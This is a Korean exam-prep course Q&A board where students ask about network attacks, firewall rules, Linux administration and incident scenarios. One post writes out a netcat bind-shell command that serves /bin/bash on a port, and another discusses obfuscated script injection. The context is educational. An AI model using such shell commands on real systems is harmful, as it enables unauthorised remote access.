TCP SYN Flooding 대응책 중 SYN_Cookie가 있는데, 이 방법은 SYN_Cookie를 통해 사용자 확인이 될 때까지 백로그 큐를 사용안한다고 알고있습니다. 그러면 netstat -antp | grep 했을 때 서버 상태는 listen 인가요? SYN_RECV 인가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의 자료 다운로드
수업중에 참조되는 강의자료 및 핵심자료는 어디서 다운받을 수 있나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
Snort SYN_FIN 플래그 조합 비정상 패킷 질문이 있습니다.
flags : SF 의 경우 연산자가 없을 경우 SYN,FIN만 설정된 경우를 말한다고 했는데 이 경우 SYN만 설정되어있어도 탐지가 되는건가요 ?아니면 두 플래그 모두 들어와야 탐지가 되는것인가요 ?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
개인적인 질문입니다
실무적으로 큰 도움이 된 강의같아요 감사합니다 지안 홈페이지에 교수님 다른 강의 찾아봤는데 이것 외에는 안보이던데 (칼리)리눅스나 자료구조론 프로그래밍 같은 다른 강의는 추후 서비스 하실 계획은 없으신지요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
파일 업로드 취약점
파일업로드 취약점 프린트 자료 Content-type에서 MIME 타입이 application/x-www-form-urlencorede, multipart/form-data 그리고 text, image, application 타입 이렇게 나뉘던데 위쪽 content-type 헤더랑 아래 content-type헤더가 어떤 차이가 있나요? 위쪽 content-type 헤더에는 application/x-www-form-urlencorede, multipart/form-data 으로만 구분되고 아래쪽 boundary 구분자로 구분된 content-type헤더는 text, image, application 타입으로만 구분 되는 건가요?? 1. 즉 위쪽 content-type헤더에 구분자로 구분된 아래 content-type에서 쓰이는 mime type을 쓸 수 없는지 궁금합니다. 2. Text 타입은 mutipart 타입인가요 application/x-www-form-urlencorded 타입인가요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
Section 38 037.네트워크기본학습_07 p158~162_문의
안녕하세요. 좋은 강의 제공해주셔서 감사합니다. 해당 강의에서 GARP에 대해서 설명을 해주시는데, GARP 목적 중 하나로 IP 충돌 감지가 있습니다만, 네트워크 상에서 자신과 동일한 IP가 설정된 호스트가 있다면, 해당 호스트에 의해서 ARP Reply를 수신받아 IP 충돌 감지를 파악하는 것 같습니다만.. 상기의 상황이 일반적인 상황은 아닌건 지 문의드립니다. 동일 네트워크 상에서 동일 IP를 가질 수 있는 상황이 궁금합니다. NAT를 통해서 외부의 IP와 NAT 내부의 IP가 같을 순 있지만 (어차피 외부에서 바라봤을 땐, 공인IP처럼 보일 테지만) 네트워크상에서 동일 IP가 있는 상황이 있을 수 있는지 궁금합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
Html tag 문의
안녕하세요 P373 과 p377의 html 특수문자에서 ‘(콜론)의 entity가 한쪽은 ' 이고 한쪽은 ' 인데 둘다 상관없나요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
포트 스캐닝 질문있습니다!
1. 닫힌 포트로 tcp SYN 패킷이 왔을때 RST+ACK으로 반응하는건 상대가 SYN_SENT로 기다리고 있을테니까 그걸 CLOSED로 바로 바꿔주기 위해서인 것 같은데, 굳이 이러는 이유는 TCP의 어떤 특성 때문인지? 신뢰성 때문이라면 무슨 제어를 위해서인지? 명확한 카테고리를 잘 모르겠습니다. 응답 안해주고 timeout되면 자동으로 closed 되게 해도 될 것 같은데, 시간적인 문제 때문일까요? 2. 어쨋든 -sF, -sX, -sN에 대해서는 닫힌 포트더라도 응답을 안하는게 보안상 더 좋아보이는데, 왜 표준을 수정하지 않는 것인지요?? 어차피 방화벽 같은걸로 방어하니까 딱히 수정할 필요없다고 보는건가요?? 3. 그리고 혹시 포트 스캐닝을 했을 때 상대방 쪽에 기록되는 시스템 로그는 뭔가요? var/log/messages??
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
85강 84어플리케이션취약점
강의자료 업로드 해주실수있나요
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
10진수 난독화(인코딩)과 16진수 난독화(인코딩) 질문드립니다.
첨부된 10진수 인코딩과 16진수 인코딩에 대해서 궁금한 게 생겨서 질문드립니다. 제가 이해한 바로는, 난독화할 문자열을 아스키코드 10진수or16진수로 인코딩하여 난독화를 수행하는데 이때, 어찌됐든 난독화된 문자열을 Client쪽(브라우저)에서 다시 디코딩하여 악성script를 실행시켜야 하는데 그래서 다시 인코딩된 문자열을 디코딩해주는 함수가 10진수- String.fromCharCode()함수 16진수- unescape()함수 로 알고있습니다. 이때, 첨부된 10진수 인코딩 소스코드를 보면 eval()함수를 사용하는데 이 eval()함수를 사용하는 이유가, 디코딩된 문자열은 단순히 문자열 취급이 되기 때문에 이 문자열이 script코드로 동작되도록 eval()함수를 통해 script구문을 실행시켜주는 걸로 알고 있습니다. 그래서 10진수코드를 보면 xyz = eval("디코딩된 문자열");을 통해 iframe이 script구문으로 동작하도록 해주고 있는 걸로 판단됩니다. 이때 궁금한 점이 2가지가 있습니다 1. eval()함수를 통해 디코딩된 문자열을 script로 동작시킨 후, 해당 결과를 xyz변수에 저장한 다음 Client쪽에서 xyz가 실행되게끔 document.write() 하는 게 맞을까요? 2. 16진수를 보면 unescape()함수를 사용하여 디코딩 한 후 바로 document.write()함수를 통해 Client쪽에서 실행되게끔 하는데 eval()함수를 사용하지 않는 이유는 무엇인가요?? 제가 알기로는 unescape()함수도 단순히 디코딩을 해주는 함수로 알고 있어서 script구문이 동작하기 위해서는 eval()함수를 사용해야 하는거 아닌가 싶어서요 이 2가지가 너무 궁금해서 계속 찾아보는데 제가 생각한 게 맞는 거 같긴한데.. 확실히 알고 싶어서 질문드립니다. 감사합니다. [+] 아 그리고 침해사고 시나리오쪽 공부하면서 궁금한점이 있어요. 지금 공부하면서 개요부분이나 관련지식에서 중요한 부분을 체크하고(가령 DBD공격이 무엇인지, 웹쉘이 무엇인지, 루트킷이 무엇인지, 리버스쉘/바인드쉘이 무엇인지), '공격시나리오' 및 '분석시나리오'에서는 챙겨야 할 부분(lsof, 디페이스 공격이란?, 웹로그 삭제 명령어, wget명령어, echo redirection (>>)으로 cron파일에 저장하는 형식 등 포인트 부분만 짚어서 공부하고 있는 중입니다. 공격시나리오나 분석시나리오 자체를 외운다기 보다는 이해하려고 노력하려 하고, 중요할 거 같은 포인트만 따로 메모해두고 있는데요 시나리오 파트를 이렇게 공부해도 괜찮을까요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
20강 finger 명령어
안녕하세요. 20강 finger 명령어가 utmp로그 파일, lastlog파일을 확인할 수 있는 명령어로 나와있는데, lastlog파일은 계정명을 붙여서만 확인할 수 있는지, 혹은 finger 명령어를 사용했을 때 logintime 으로 확인할 수 있기에 표기된 건지 헷갈려서 질문드립니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
62강 제한된 트래픽 흐름의 기밀성 보장에 대해 질문있습니다.
알기사 2022교재 p281의 맨 아래 그림은 ipsec 터널모드의 보호구간입니다. 설명과 같이 보면 터널/보안 게이트웨이 구간정보는 노출될 수 있다고 나와있는데, 그림에서는 게이트웨이 구간이 ipsec 보호 구간이라고 적혀있습니다. 이 부분이 이해가 안됩니다. 게이트웨이 구간정보가 노출되는데 ipsec 보호 구간이라고 할 수 있나요? ipsec 보호 구간이 말하는 것을 저는 트래픽 흐름의 기밀성을 보장한다 라고 생각하고 있는데 혹시 그게 아닌 다른 뜻이 있는건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
7강 24:35
find . -type f -user root \( -perm -4000 -o -perm -2000 \) -exec ls -l {} \; 마지막에 ls -l {} 이후에 역슬래시랑 세미콜론도 필수인지 궁금합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
안녕하세요! 질문있습니다
2계층 주소는 서로 다른 네트워크로 라우팅 되지 않는다고 되어있는데(교재 p.160), 이 부분 이해가 안됩니다. 자세한 설명 부탁드립니다!
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
directed broadcast관련하여 질문드립니다
일반적으로 Broadcast 패킷은 L3장비를 통과할수 없다고 알고있는데요 Smurf Attack을 보면 Directed broadcast패킷은 L3장비를 통과할수 있는거같은데 맞나요?? 목적지가 255.255.255.255인 패킷은 L3를 통과할수 없지만 192.168.10.255와같은 패킷은 L3장비에서 차단하는 설정이 있는게 아니라면 통과할수 있는게 맞는걸까요??
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
GARP관련하여 질문드립니다
Land Attack관련해서 공부하다가 GARP와 해깔리는 부분이있어 질문드립니다 Land Attack이라는게 Src IP와 Dst IP가 모두 Target Host의 IP로 설정된 공격이고 해당패킷을 받으면 자기자신에게 다시 응답을 보내는 공격으로 DoS공격이라고 이해했습니다 현재는 Src IP와 Dst IP가 동일한 패킷이 들어올경우 해당 패킷을 Drop시켜서 현재는 통하지 않는 공격이라고 이해했구요 그런데 GARP로 네트워크내에 자신과 동일한IP를 사용하는 Host가 있는지 탐지한다고 설명해주셨던게 기억이납니다 이때도 Src IP와 Dst IP가 동일한패킷을 만들어 브로드캐스트로 전송해서 탐지하는 방식이라고 이해했는데요 GARP패킷에 대해서는 OS단에서 Drop하지 않는건가요?? Src IP와 Dst IP가 동일한 패킷은 Drop하지만 GARP패킷은 예외적으로 Drop하지 않는다고 이해하면 될까요?? 그리고 추가적으로 이해가 안가는 부분이있습니다 예를들어 192.168.10.10이라는 IP에 대해서 GARP로 동일한IP를 사용하는 단말이 있는지 확인하려고 GARP를 브로드캐스트로 전송했을때 만약 192.168.10.10을 사용하는 단말이있고 해당 패킷을받아 응답하려고 할때요 Src IP : 192.168.10.10이고 Dst IP : 192.168.10.10패킷에 대해서 응답패킷은 Src IP : 192.168.10.10이고 Dst IP ; 192.168.10.10이 될텐데 이걸 그냥 수신패킷의 Src MAC을 Dst MAC으로 설정해서 응답하는건가요?? 개행을 했는데도 질문에는 개행이 안되게 올라가네요... 좀 질문이 난잡하게 보이는데 설명좀 부탁드릴께요ㅠ
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
P314 dns
이론서 dns 네임서버 질의.응답 패킷분석 2 응답 데이터가 512바이트 초고ㅓ일 경우 tcp 포트 사용 와이어샤크 캡쳐가 떠있는데 응답데이터를 처음보냈을 때 udp로 TC를 설정한 패킷과 재전송한 응답 tcp 패킷의 길이가 왜 달라지나요? 레코드 타입도 같은데
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
앗.. 질문할 것이 하나 더 생겨서 답변안달렸으면 수정하려 했는데 답변이 달렸네요 죄송합니다 하나만 더 질문할게요..
죄송합니다 강사님 갑자기 헷갈리는 부분이 생겨서 지금까지 찾아보다가 아직도 아리쏭해서 아까 질문글 올렸던 거를 수정해서 질문하려 했는데 이미 답변이 달려있어서 다시 질문글을 작성하게 됐습니다.ㅠㅠ 같은 리버스쉘 시나리오 단원입니다. 크게 중요한 부분은 아닌 것 같지만 그래도 이게 괜히 찝찝해서 질문드려요 리버스쉘 시나리오 개요부분을 보면 "웹서버의 루트(root) 계정을 탈취하기 위해"라 되어있는데 해당 계정을 탈취해서 uid, gid 0인 일반사용자를 만들기까지 하니 시스템(os) root계정이라 생각이 드는데 제가 갑자기 알고있던 지식이 충돌해서 여기서 아리쏭한점이 생겨버렸네요 DB같은 경우 DB의 root와 시스템에 있는 root가 다른 걸로 알고있습니다. 그래서 어플리케이션 root계정 ≠ 시스템 root 계정으로 기본적으로 이해하고 있었는데 여기서 웹서버의 root계정을 탈취한다는 것은 문맥적으로 보면 시스템OS인 것은 확실한데 웹서버는 기본적으로 최소한의 권한을 가진 사용자가 실행되게끔 하기 위해 서비스프로세스를 apache 계정 및 그룹을 만들어서 실행시키는 걸로 알고 있어요. 대신 80번포트는 privileged port라 관리자(root)만이 실행할 수 있다고 알고 있습니다. 그래서 이때 웹서버의 root계정을 탈취한다는 의미가, privileged port(80) 웹서버를 실행시킨 계정이 root으로 이해가 됩니다. 그래서 개인적으로 이해한 부분이 웹서버의 root계정을 탈취 => 웹서버를 통해 시스템 root 계정을 탈취 이렇게 풀어서 이해하게 되는데 맞을까요? 이게 괜히 자꾸 "웹서버의 root"이 문맥에 사로잡혀서 자꾸 머릿속에 맴돌아서 죽겠습니다 ..ㅠㅠ
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
리버스쉘 침해사고 중에 궁금한 거 하나 질문드립니다
일반적으로 바인드쉘 방식인 telnet, ssh 등 원격터미널 접속을 방화벽에서 차단하므로 리버스쉘 방식을 통해서 서버쪽이 Client(공격자)쪽으로 요청하여 연결되게 한 다음 exec를 통해 실행이미지를 /bin/bash(bash환경)터미널로 변경함으로써 /bin/bash쉘이 실행되게끔 하잖아요? 여기서 궁금한 점이 생겼습니다 공격자가 어차피 내부적으로 root권한을 탈취해서 해당 공격이 가능한 것이잖아요? 그래서 반대로 리버스쉘 방식이 아닌 바인드쉘 방식으로 아래처럼 공격하는 기법도 가능한지 궁금합니다. 제가 전체적인 흐름과 동작방식을 이해했을 땐 충분히 아래 방식대로도 공격할 수 있을 거라 생각이 들어서 질문드려요 만약 방화벽 정책이 화이트리스트 정책이 아니라 블랙리스트 정책이여서 ssh, telnet 포트만 차단하고 있다고 가정하면 공격자가 타겟 서버쪽에 nc -lvp 1234 -e /bin/bash 명령어를 통해 특정 포트를 열고 있고, 연결될 시 실행이미지를 /bin/bash로 변경시키는 nc프로세스를 띄웠다고 가정하면 공격자는 단순히 nc [타겟서버ip/도메인] 1234 이렇게 해당 타겟서버의 nc프로세스 포트와 연결함으로써 쉘을 획득할 수도 있을까요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
wireshark와 4way_handshaking 관련 문의
안녕하세요 선생님 교재 실기책 최신판 184페이지 강의 보다가 질문생겼습니다. 4way handshaking 에서 캡처된 화면인데요 책 삽화그림하고 저기 캡처한 강의 하고 비교해볼대 갠적으로 좀 혼동됩니다. dst_address, port_num rst_address, port_num 이거 방향이 혼동됩니다. 교재에 그림하고 이미지캡처그림하고 반대로 된것 같기도 하고, 더군다나 연결 접속방향은 윈도우즈(randomiz port)가 리눅스(23port)로 텔넷연결이 됬는데 제가 봤을땐 반대로 연결된걸로 보입니다. 어느게 맞는건가요 제가 아직 잘 몰라서요...^^; 확인좀 부탁드립니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
입출력 재지정
안녕하세요, 강의 듣다가 궁금한 점이 생겨 질문 남깁니다. [Section 4 003.UNIX/Linux기본학습_02 p30~31] 강의 중 'nohup ./batch.sh 1> /dev/null 2>&1' 명령어 실행을 예시로 들어주셨는데요. 표준출력을 /dev/null로 보내고, 그 뒤에 표준 에러를 다시 표준출력으로 보낸다고하면, 표준에러는 앞서 지정한 것과 같이 /dev/null로 가게 되나요, 아니면 그대로 화면에 출력이 되나요? 답변 주시면 감사하겠습니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
RUID, EUID관련 질문드립니다
안녕하세요 강사님 강의 잘듣고있습니다 감사합니다 강의중 궁금한점이 있어 질문드립니다 버퍼오버플로우쪽 실습에서 setreuid와 setregid함수를 사용해서 ruid와 euid를 변경하여 쉘을 실행하는걸 보여주셨는데요 기존에 설명해주실때 파일내에서 자원에 접근할때는 euid를 사용하고 새로운 파일을 실행시킬때는 ruid를 사용한다고 설명해주셨던걸로 기억합니다 위의 실습에서 보여주신것과같이 프로그램내에서 함수를 사용할때는 euid를 사용하는건가요?? buf_over.c프로그램에 set UID를 설정해서 함수를 실행시킬때는 root의 권한으로 실행시켰다고 이해했는데 맞을까요?? 그리고 쉘을 실행시킬때는 ruid를 사용하는건가요??
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
HTTP GET Flooding 대처 방법 질문드립니다.
선생님 안녕하세요 HTTP GET Flooding 에 대한 대처방법이 책에 명시 되어있지 않아 KISA 디도스_공격_대응_가이드_최종본 을 보고 질문 드립니다. 이미지에 나온것처럼 클라이언트 요청에 쿠키값을 추가하여 응답을 보낸 후 , 보낸 쿠키값을 포함하지 않은 응답은 비정상 사용자로 판단하여 차단 이라고되어있는데.. 이게 무슨뜻인지 모르겠습니다. 그러니까 웹서버에서 Set-Cookie : 정상사용자 등의 Set-Cookie 를 하면 , 클라이언트 -> 웹서버로 요청시 Cookie : 정상사용자 로 요청 하는 것을 검사 한다는 의미일까요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
Syn flooding
Syn flooding 대응책에서 동일 출발지 ip로 동시연결개수 5회 초과 시 차단이라고 나와있는데 공격자는 랜덤ip를 출발지로 flooding을 수행하는데 왜 이 방법이 대응되나요? 제가 잘못이해하고있다면 설명부탁드립니다. Iptables -A INPUT -p TCP —dport 80 —syn -m connlimit —connlimit-above 5 -j DROP
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
강의 시청 문의드립니다
2021지안패스 이용 중인데, 2022년 실기 강의와 2021년 실기강의 차의점이 무엇인지 궁금합니다. 2021 강의밖에 없어서 어떤걸 더 준비해야하는지요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
법규
안녕하세요 2022 기출문제에서는 2021 기출문젝와 다르게 법규가 개정되었다고 알고 있는데 저는 2021 기출문제랑 이론서에 법규는 그냥 아예 보지 않고 국가 법령 센터에서 개정된 내용으로만 공부하면 될까요??
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
실기 최신강의
올해 실기 최신강의는 6강 더 추가 된거 같은데 급해서 21년도꺼 결제해서 보고 있습니다. 뭐가 달라진건가요 올해년도와 작년도 내용하고? 이럴바에 좀 더 기다렸다가 구매 할걸 그랬나봐요...
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
spf 기술 질문드립니다
선생님 20121 실기 문제에서 송신ip를 송신dns에 질의라고되있는데 여기선 reverse dns 질의를 하는걸까요? ip > 메일 도메인 ex @naver.com 처럼 나오는걸까요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
호스트의 유효범위 문제
도저히 이해할 수 없어서 질문드립니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
실기문제집 146번의 2)번 문제 문제 질문드립니다.
백업파일 접근권한을 600으로 만들기 위해 umask 설정을 umask066으로 하는것은 알겠는데 그 뒤의 umask 022 설정은 왜 한번 더 쓰는 것 인가요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
강의자료
2021년에 첨부되어있는 자료들과 2022년에 첨부되어 있는 자료들의 내용은 같은 것인가요?? 제가 다운로드 받아봐서는 파일명도 얼추 거의 비슷한 것 같은데요 추가된 파일이 있거나, 동일한 파일명이지만 수정된 내용인 파일이 있을지 궁금합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
실기 강의 중 [연습장] 내용
안녕하세요~ 항시 양질의 강의덕분에 도움 받고 있습니다. 다름이 아니고, 2강부터 나오는 [연습장] 내용은 강의자료로 따로 안주시는건가요? 그냥 제가 타이핑해서 하는 수 밖에 없는걸까요??? 제공 안하시는 이유가 별로 중요하지 않아서 일까요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
pwunconv 질문드립니다.
중요한건 아닌 것 같지만 궁금해서 질문드립니다! 일반 패스워드 정책을 사용해도 /etc/login.defs의 pw aging이 사용되는거죠?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
질문
tcp wrapper를 사용할 때 inetd.conf 파일의 실행경로를 /usr/sbin/tcpd라고 한다고 하셨는데, 서비스가 telnet이든 ftp든 상관없이 /usr/sbin/tcpd로 통일인가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
시험에서 iptables 정책 해석을 이렇게 적어도 될까요?
iptables -A INPUT -p tcp --syn --dport 80 -m connlimit --connlimit-above 5 –j DROP 라는 정책이 있다면, => inbound되는 TCP패킷 중 SYN플래그가 설정되어 있고, 80번포트를 목적지로 하는 모든 패킷에 대해 동일한 IP로부터 동시연결를 5개로 제한하고, 5개 초과시 차단(DROP)한다. 이렇게 적어도 될까요? 그게 아니면 원칙적으로 "inbound되는 패킷 중 tcp프로토콜을 사용하며, SYN플래그가 설정되어 있으며, 80번포트를 목적지로하는 모든 출발지IP를 가진 패킷에 대해, 동일한 IP의 동시연결 개수를 5개로 제한하며, 5개를 초과할 시 차단한다." 라고 적어야 할까요? 둘다 똑같은 의미라 생각이 들지만 -p tcp에 대해서 "inbound되는 TCP패킷 중"이라 적어도 문제가 없는지 궁금하여 질문드립니다.
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
질문
10강에서 ~가 홈디렉터리를 의미한다고 했는데, 그러면 /와 ~ 둘다 홈디렉터리를 의미하는 것이라고 보면 될까요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
선생님 IPSEC 질문 드립니다
선생님 안녕하세요 실기 책 전송모드 , 터널 모드 둘다 IP Payload 뒤에 IPSec-T(IPSec 트레일러) 그림이 있는데요 상세 프로토콜 설명시 AH 프로토콜 동작 모드 그림에서는 IP Payload 뒤에 트레일러가 빠져있는데 AH로 동작시에는 별도 트레일러가 없는걸까요? ESP에서만 ESP-T 만 존재하는걸까요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
iptables 정책 질문드립니다.
안녕하세요. 강사님 iptables에 대해서 궁금한 게 있어서 질문드립니다. iptables [테이블] [체인] [룰] [타겟]이 기본 구문이라고 나와있는데 해당 구문 자체도 명령어이기 때문에 쉘스크립트에 자동으로 실행되게끔 정의해두는 게 맞을까요? 구글에서 찾아보니 이렇게 나와있어서요. 즉 snort처럼 /etc/snort/rules/local.rules 파일에 rule을 정의하는 것이 아닌, iptables는 명령어로써 rule을 추가하는 걸로 이해했습니다. 따라서 rule을 추가하기 위한 iptables 명령어가 자동화되어 실행될 수 있도록 .sh파일로 정의해두는 걸로 이해했는데 맞을까요? 그래서 iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT 같은 iptables 구문이 실행되면 INPUT체인에 rule이 등록이 되는 거고, INPUT체인에 등록된 rule을 확인하기 위해서는 iptables -L INPUT -n 명령어를 통해 확인할 수 있는 게 맞을까요? snort와 다르게 단순히 구문만 있는 게 아니라 이해하는데 좀 더딤이 있어서 질문드립니다. 꼭 답변 기다리겠습니다.. (요약하면 snort는 설정파일에 rule 구문 작성을 통해 정책 설정, iptables는 iptables명령어로 rule 구문 작성을 통해 체인에 정책 설정이 맞겠죠?)
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
질문
강사님 ! /etc/profile 모두에게 적용되는 환경 설정 파일이라고 하셨는데 로그인하는 사용자들 다 같은 방식으로 환경 설정 파일이 로드된다는 의미인가요? 설정되는 환경변수는 사용자마다 다른거 맞나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
미리 준비를 하려다보니 2021 강의를 구매해서 듣는데 새로 업데이트 된 내용을 수강할수는 없나요?
안녕하세요 현재 2021강의를 듣는 중인데 2월부터 준비하려다 보니 2022년 강의가 없어서 2021년 강의를 구매했는데 2022년 강의가 업데이트 되었네요 혹시 2022년 강의 전체를 다 구매하는게 아니라 새로 업데이트 된 부분만 결제를 해서 볼 수는 없나요?
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
5강에서 하드링크 질문드립니다.
하드링크는 결국 디스크 상에서의 동일한 하나의 데이터를 inode number를 기반으로 공유하고 있는걸로 알고있는데, 34쪽 그림에서 i-node 블럭 하나가 dataBlock 2개를 가리키고 있어서 헷갈려서 질문드립니다. 하드링크를 만들면 같은 내용의 dataBlock이 하나 더 생기는 건가요? 아니면 파일이 dataBlock 2개에 걸쳐서(나눠서?) 저장되어 있다는 것을 표현한건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
logrotate 질문드립니다.
제가 헷갈리고 있는것 같아서 질문드립니다. p.103쪽에 맨 밑 예시 그림을 예로 질문드리겠습니다. <질문 1.> access_log 파일의 7일치 로그를 access_log-20170305 로그파일에 백업하고 또 access_log 파일의 7일치 로그를 access_log-20170312에 백업하는 식으로 계속 진행하다가 마지막으로 access_log-20170402 로그파일에 백업을 완료해서 총 4개의 백업로그 파일을 채우고나면 그제서야 access_log 파일을 create해서 새로운 access_log 로그파일을 생성하는건가요? <질문 2.> create가 순환시 새로운 로그파일을 생성해준다고 했는데 이 create를 해주는 이유가 궁금합니다. <질문 3.> 교재 p.103쪽 맨 위에 daily, monthly, weekly : 일 단위, 월 단위, 주 단위 로그파일 순환 rotate n : 순환 로그파일의 개수를 n개로 설정 이렇게 설명이 되어 있는데 첫번째 로그파일과 두번째 순환 로그파일은 서로 다른 의미의 로그파일인가요? <질문 4.> 교재 설명에서 순환이라는 개념을 제가 헷갈려 하는것 같은데 정확히 어떤 과정을 순환이라고 하는지 궁금합니다. 예를 들어 rotate = 4 일때, 순환로그파일 개수 4개 만큼의 로그파일에 로그 백업을 완료한 시점이 순환인건지, 순환로그 파일1, 2, 3, 4가 있을 때 순환로그 파일1에 로그를 백업을 완료하고 순환로그 파일 2에 로그를 백업하는 과정을 순환이라고 하는지 정확히 개념을 모르겠습니다. 바쁘신 와중에 질문을 봐주셔서 감사합니다!
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의 ip 인증 관련
안녕하세요. 강의 ip 인증과 관련해서 문의드리고자 합니다. 제가 주말에는 집, 평일에는 기숙사에 생활을 하고 있습니다. 주말에 강의를 결제를 하고 수강을 해서 집 ip로 기기가 인증되어 있는데, ip 인증 기숙사 쪽 디바이스로 변경 요청드리고 싶습니다. 강의 이력을 보시면 아시겠지만, 다 제가 수강했던 이력들입니다. 확인해주시면 감사하겠습니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
산업기사관련 질문입니다
필기책의 앞부분에는 단원별 출제빈도가 나오던데 실기책에는 없어서 질문드립니다 기사 시험과 비교해 산업기사 실기시험 준비에 유념해야 할 부분이 있을까요? 가령 출제점위라던지....
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
연습장 자료는 어디서 다운받을수 있나요?
3강에 나오는 연습장 자료는 어디서 다운받을수 있나요? 아래 다른분도 질문하셨던데요 답변을 열어볼 수 없어서 또 질문하네요...
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
pam 모듈에 대해서 질문 드립니다.
안녕하세요 pam 모듈 실습중에 궁금한 점이 있어 질문 드립니다. [첫번째 질문입니다.] 예를 들어 root 계정의 원격 접속 제한 실습을 하실때 auth required pam_securetty.so 라고 책에는 기술 되어있는데 취약점 분석 가이드에서는 auth required /lib/security/pam_securetty.so 라고 절대 경로로 지정 되어 있는데 어떠한 차이가 있는 건지요? [두번째 질문입니다.] 책에서는 원격접속 제한시 /etc/pam.d/remote 에서 설정값을 넣어주었는데 취약점 분석가이드 설명에서는 /etc/pam.d/login 에서 설정하도록 되어있는데 버전의 차이인가요 아니면 두 곳다 가능한가요? [마지막 질문] vi 로 편집시 auth [ ] required [ ] pam_tally2.so [ ] <-- 공백을 스페이스로 주면 되는 건지요 기본 설정이 되어 있는 파일은 한칸씩 뛰어져 있지 않고 tab으로 설정되어있는 것처럼 공백처리 되어있어서 문의드립니다. 이상입니다. 감사합니다 ^^
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
질문
24페이지에서 (2021) 원격에서 인증요청을 할 경우 LSA에서 판단후(원격인지) NTLM의 시도/응답 프로토콜을 이용해 challenge를 보내는 건가요? SAM 이 발급하는 인증 토큰과 DC가 발급하는 접근 토큰은 같은건가요? 어떻게 다른가요? 윈도우 서버는 시도/응답으로 사용자 인증을 한 후 또 DC를 이용해 원격 사용자를 인증하나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
실기시험 각 회차별 문제 문의
실기시험은 필기시험처럼 각 회차별 문제가 없나요? 교재에 문제집이 있긴하지만 너무 많아서 최근엔 어떤 트렌드로 출제되는지 알고 싶어서요.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
2021실기 문제집 331번 질문드립니다.
331번 3) 공격자(공격근원지)는 누구인가? arp -a 로 캐시테이블 조회시 맥주소가 같은건 192.168.13.1 과 192.168.13.22 로 보입니다. 디폴트 게이트 웨이 주소 192.168.13.1 의 맥주소는 cc-cc-cc-cc-cc-cc 로 보이구요 공격자가 192.168.131.22 라고 단정지을수 있는 근거가 있을까요? 192.168.13.1 맥주소 arp 캐시 테이블도 변조 된걸로 보여서요..
2021 정보보안(산업)기사 실기대비 강의 [교재별도]
질문
강사님 질문이 있습니다. 2021책(이론,문제)사용해도 되나요? 윈도우 인증에서 사용자가 윈도우 한테 어떻게 인증요청을 하는 건가요? 부팅후 passwd입력하는 것은 인증 요청이 가고 challenge값을 전송 받은후 입력하는 건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
연습장 자료 관련
안녕하세요. 3강부터 강사님께서 연습장을 띄워서 강의를 진행하시는데, 어디서 연습장을 다운받을 수 있나요? 확인 부탁드립니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
지안패스 2022
지안패스 구매했는데 2022 실기 강의는 새로 사야하는건가요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
강의
바쁘신데 고생많으십니다. 나머지 강의는 언제쯤 올라올까요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
2강 문의
2강 강의 중 연습장이 나오는데 자료가 어디에 있나요?
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
갤럭시탭 강의 수강이 안돼요
왜 탭으로는 강의 목록이 안보이나요
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
21년, 22년 실기강의 내용 차이가 큰지요?
21년 실기강의 내용을 보고 있는데 22년 실기강의가 새로 올라온것 같네요. 내용 차이가 많은지요? 22년 실기강의로 다시 봐야할지 고민되서 문의 합니다.
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
아이패드 강의 어떻게 듣나요
재생이 안되요…
2022 정보보안(산업)기사 실기대비 강의 [교재별도]
선생님 2022 정보보안기사 실기 대비 강의
전 2021년 강의를 신청해서,, 2022년에 추가된 이메일 보안은 들을수없는건가요?
